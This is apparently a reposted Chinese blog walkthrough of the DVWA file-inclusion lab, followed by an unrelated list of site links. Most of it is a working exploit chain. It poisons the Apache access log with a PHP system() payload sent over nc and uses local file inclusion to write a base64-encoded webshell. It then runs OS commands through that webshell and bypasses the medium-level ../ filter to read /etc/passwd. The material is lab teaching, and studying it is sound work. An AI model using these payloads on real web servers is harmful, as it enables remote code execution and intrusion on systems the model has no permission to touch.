file include 文件包括漏洞,毒化日志,并生成木马,执行系统命令 dvwa低安全
来源:互联网 发布:崩坏3矩阵索尔 编辑:程序博客网 时间:2024/04/29 16:15
root@kali:/var/log/apache2#ls -lh
总用量 2.4M
-rw-rw-r-- 1root root 1 6月 28 15:50 access.log
日志毒化:
nc172.19.180.27 80
GET/hazStart<?php system(base64_decode($_GET['a']));?>hazEnd HTTP/1.1
root@kali:/var/log/apache2#cat access.log
172.19.180.28- - [28/Jun/2016:15:50:53 +0800] "GET /hazStart<?phpsystem(base64_decode($_GET['a']));?>hazEnd HTTP/1.1" 404 469"-" "-"
echo "<?php system(base64_decode($_GET['p']));?>" > ../../webshell.php
将上面语名进行base64编码,结果:
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
利用file include漏洞将上面的WEB SHELL写入dvwa的目录下面(前提a、dvwa目录下要有写的权限;b、日志文件需要有读的权限):
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
生成的文件:
root@kali:/var/www/html/dvwa#cat webshell.php
<?phpsystem(base64_decode(['p'])); ?>
下面与上面的不同在于转义了$符号
echo "<?phpsystem(base64_decode(\$_GET['p']));?>" > ../../webshell.php (注意此处区别,$这个符号需要转义,否则在生成的webshell中少了$_GET)
ZWNob6AiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoXCRfR0VUWydwJ10pKTsgPz4ioD6gLi4vLi4vd2Vic2hlbGwucGhwDQo=
http://www.motobit.com/util/base64-decoder-encoder.asp onlinebase64 encoder and encoder
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoXCRfR0VUWydwJ10pKTsgPz4iID4gLi4vLi4vd2Vic2hlbGwucGhw
root@kali:/var/www/html/dvwa#cat webshell.php
<?phpsystem(base64_decode($_GET['p'])); ?>
http://172.19.180.27/dvwa/webshell.php?p=cGluZyA4LjguOC44IA== 在操作系统上执行ping 8.8.8.8
ps -ef|grep ping
www-data 7857 7718 0 17:19 ? 00:00:00 sh -c ping 8.8.8.8
中等
php -a
php > $a =str_replace( array("../", "..\""), "","..././/..././/..././/..././/..././/..././/etc/passwd");
php > echo$a;
..//..//..//..//..//..//etc/passwd
php > $a =str_replace( array("../", "..\""), "","../../../../../../etc/passwd");
php > echo$a;
etc/passwd
php >
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=....//....//....//....//....//....//etc/passwd
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=..././/..././/..././/..././/..././/..././/etc/passwd
- file include 文件包括漏洞,毒化日志,并生成木马,执行系统命令 dvwa低安全
- 通过DVWA学习文件包含漏洞(File Include)
- 通过DVWA学习命令执行漏洞(Command Execution)
- 通过DVWA学习文件上传漏洞(File Upload)
- Dvwa之文件上传漏洞
- Dvwa漏洞测试之文件包含笔记
- dvwa文件包含漏洞和远程文件利用漏洞
- PHP文件包含命令(include,require)及漏洞利用
- 几维安全分析“Xavier”安卓木马:可静默收集数据并远程代码执行
- OS命令执行漏洞
- Struct2命令执行漏洞
- 命令执行漏洞
- 命令执行漏洞总结
- ImageMagick 命令执行漏洞
- CouchDB未授权访问导致执行任意系统命令漏洞
- Windows系统SMB/RDP远程命令执行漏洞
- 利用CouchDB未授权访问漏洞执行任意系统命令
- DVWA Upload漏洞(medium)
- Maven依赖排除 禁止依赖传递 取消依赖的方法
- js prototype 原型继承问题
- Codeforces Round #357 (Div. 2)
- 万众创新:你是一个优秀的程序员吗?
- Android vold核心篇(VolumeManager)
- file include 文件包括漏洞,毒化日志,并生成木马,执行系统命令 dvwa低安全
- IOS项目硬件调用前的权限判断
- 互联网时代程序员如何避免知识半衰期?
- 找位置
- The Little Redis Book
- 求高人指点:一个前所唯有的Java加载顺序的问题。
- 【语言-汇编】圆周率(PI)计算
- ANT批量执行Jmeter脚本
- Hive与JDBC示例